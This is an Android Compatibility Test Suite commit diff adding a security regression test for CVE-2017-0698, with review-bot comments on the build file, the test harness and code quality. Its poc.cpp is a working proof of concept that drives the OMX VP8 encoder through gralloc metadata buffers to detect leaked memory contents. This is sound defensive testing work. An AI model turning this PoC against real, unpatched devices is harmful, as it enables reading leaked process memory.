CTS test for Android Security b/35467458 b/72388981

Test: successful run of newly introduced CTS test case.
Bug:35467458
Bug:72388981
Change-Id: I877c1c33cfff874405551920de52b206a095ab5c
(cherry picked from commit 3ac8a06d2fc850560e8bb17fccefbe14b005ebab)
Merged-In: I877c1c33cfff874405551920de52b206a095ab5c
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 69a16e0..20f5fe7 100755
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -111,6 +111,7 @@
         <!--__________________-->
         <!-- Bulletin 2017-07 -->
         <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+        <option name="push" value="CVE-2017-0698->/data/local/tmp/CVE-2017-0698"/>
         <option name="push" value="CVE-2016-2109->/data/local/tmp/CVE-2016-2109"/>
 
         <!--__________________-->
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0698/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0698/Android.mk
new file mode 100644
index 0000000..89afaff
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0698/Android.mk
@@ -0,0 +1,38 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0698
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES := $(TOP)/frameworks/av/include \
+                    $(TOP)/frameworks/av/media/libstagefright \
+                    $(TOP)/frameworks/native/include/media/openmax \
+                    $(TOP)/hardware/qcom/media/msm8996/mm-core/inc
+
+LOCAL_SHARED_LIBRARIES := libstagefright libmedia libutils libstagefright_foundation \
+                          libgui liblog libui libbinder
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS := -Wall -Werror
+include $(BUILD_CTS_EXECUTABLE)
\ No newline at end of file
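Review bot: The include path `$(TOP)/hardware/qcom/media/msm8996/mm-core/inc` ties this module to a single vendor tree, although the PoC drives the software codec `OMX.google.vp8.encoder` and nothing in poc.cpp appears to reference a QCOM-specific symbol; the matching `#include <OMX_QCOMExtns.h>` in the poc.cpp hunk looks equally unused. Dropping that path and that include would let the artifact build on trees that lack the vendor directory. If a QCOM extension is genuinely required, a comment next to the include naming the symbol that needs it would make the dependency intentional.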
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0698/poc.cpp b/hostsidetests/security/securityPatch/CVE-2017-0698/poc.cpp
new file mode 100644
index 0000000..f12e6dc
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0698/poc.cpp
@@ -0,0 +1,132 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <binder/IServiceManager.h>
+#include <binder/MemoryDealer.h>
+#include <media/IMediaPlayerService.h>
+#include <media/IOMX.h>
+#include <OMX_Component.h>
+#include <OMX_IndexExt.h>
+#include <OMX_QCOMExtns.h>
+#define VULNERABLE 113
+
+using namespace android;
+
+template <class T>
+static void InitOMXParams(T *params) {
+  params->nSize = sizeof(T);
+  params->nVersion.s.nVersionMajor = 1;
+  params->nVersion.s.nVersionMinor = 0;
+  params->nVersion.s.nRevision = 0;
+  params->nVersion.s.nStep = 0;
+}
+
+struct DummyOMXObserver : public BnOMXObserver {
+ public:
+  DummyOMXObserver() {}
+
+  virtual void onMessages(const std::list<omx_message> &messages __unused) {}
+
+ protected:
+  virtual ~DummyOMXObserver() {}
+};
+
+bool connectOMX(sp<IOMX> &omx) {
+  sp<IBinder> binder;
+  sp<IServiceManager> sm = defaultServiceManager();
+  binder = sm->getService(String16("media.player"));
+  sp<IMediaPlayerService> service = interface_cast<IMediaPlayerService>(binder);
+  if (binder == NULL) {
+    return false;
+  }
+  omx = service->getOMX();
+  if (omx == NULL) {
+    return false;
+  }
+  return true;
+}
+
+int main() {
+  sp<IOMX> service;
+  if (connectOMX(service) == false) return -1;
+
+  IOMX::node_id node = 0;
+
+  const char *codecName = "OMX.google.vp8.encoder";
+
+  sp<DummyOMXObserver> observer = new DummyOMXObserver();
+
+  status_t err = service->allocateNode(codecName, observer, nullptr, &node);
+  if (err != OK) {
+    return -1;
+  }
+
+  OMX_PARAM_PORTDEFINITIONTYPE def;
+  InitOMXParams(&def);
+  def.nPortIndex = 0;
+  err = service->getParameter(node, OMX_IndexParamPortDefinition, &def,
+                              sizeof(def));
+
+  int inMemSize = def.nBufferCountActual * def.nBufferSize;
+  int inBufferCnt = def.nBufferCountActual;
+  int inBufferSize = inMemSize / inBufferCnt;
+
+  sp<MemoryDealer> dealerIn = new MemoryDealer(inMemSize);
+  IOMX::buffer_id *inBufferId = new IOMX::buffer_id[inBufferCnt];
+  List<sp<IMemory>> inQueue;
+
+  for (int i = 0; i < inBufferCnt; i++) {
+    sp<IMemory> memory = dealerIn->allocate(inBufferSize);
+    err = service->useBuffer(node, 0, memory, &inBufferId[i], inBufferSize);
+    inQueue.push_back(memory);
+  }
+
+  sleep(1);
+
+  MetadataBufferType type = kMetadataBufferTypeGrallocSource;
+  err = service->storeMetaDataInBuffers(node, 0, (OMX_BOOL)1, &type);
+
+  sp<GraphicBuffer> graphicbuffer =
+      new GraphicBuffer(def.format.video.nFrameWidth,
+                        def.format.video.nFrameHeight, PIXEL_FORMAT_RGBX_8888,
+                        android::GraphicBuffer::USAGE_HW_VIDEO_ENCODER);
+
+  for (int i = 0; i < inBufferCnt; i++) {
+    err = service->updateGraphicBufferInMeta(node, 0, graphicbuffer,
+                                             inBufferId[i]);
+  }
+
+  sleep(1);
+
+  while (!inQueue.empty()) {
+    String8 s;
+    sp<IMemory> memory = *inQueue.begin();
+
+    for (int i = 0; i < inBufferSize / 4; i++) {
+      int val = *((int *)memory->pointer() + i);
+      if (val != 0) {
+        char tmp[64];
+        snprintf(tmp, 64, "0x%x ", val);
+        s.append(tmp);
+      }
+    }
+    if (!s.isEmpty()) return VULNERABLE;
+    inQueue.erase(inQueue.begin());
+  }
+
+  return 0;
+}
\ No newline at end of file
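Review bot: The result of `getParameter` is stored in `err` but never checked before `def.nBufferCountActual` and `def.nBufferSize` are read, so a failed query leaves `def` with whatever was on the stack and feeds that into `new MemoryDealer(inMemSize)`. In the same stretch, `inMemSize / inBufferCnt` divides by zero whenever the port reports zero buffers. The `useBuffer` loop likewise overwrites `err` each iteration without looking at it, so a failed call leaves `inBufferId[i]` uninitialized and later passed to `updateGraphicBufferInMeta`. Inserting `if (err != OK || def.nBufferCountActual == 0) return -1;` after the `getParameter` call and `if (err != OK) return -1;` after each `useBuffer`/`updateGraphicBufferInMeta` call keeps harness failures on exit code -1 rather than letting them be mistaken for, or mask, the 113 `VULNERABLE` signal. The `String8 s` accumulation is only tested for emptiness, so returning `VULNERABLE` at the first non-zero word would make the check simpler and avoid the per-iteration `snprintf`.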
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_07.java b/hostsidetests/security/src/android/security/cts/Poc17_07.java
index 1bf5b9a..8c9ed78 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_07.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_07.java
@@ -33,4 +33,12 @@
             getDevice(), 60));
     }
 
- }
+    /**
+     * b/35467458
+     */
+    @SecurityTest
+    public void testPocCVE_2017_0698() throws Exception {
+      assertFalse("VULNERABLE EXIT CODE FOUND", AdbUtils.runPocCheckExitCode("CVE-2017-0698",
+                  getDevice(), 60));
+    }
+}
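Review bot: The new method's body is indented by six spaces (`assertFalse(...)` at column 6, its continuation at column 18), while the surviving context lines from the method above use the file's four-space steps (`getDevice(), 60));` at column 12, closing brace at column 4); aligning the new lines to 8 and 16 spaces keeps the file consistent. The Javadoc names only `b/35467458`, although the commit message also lists `b/72388981` and the test is for CVE-2017-0698; `/** b/35467458, b/72388981 - CVE-2017-0698 */` would make the test self-describing. The enclosing class starts outside this hunk.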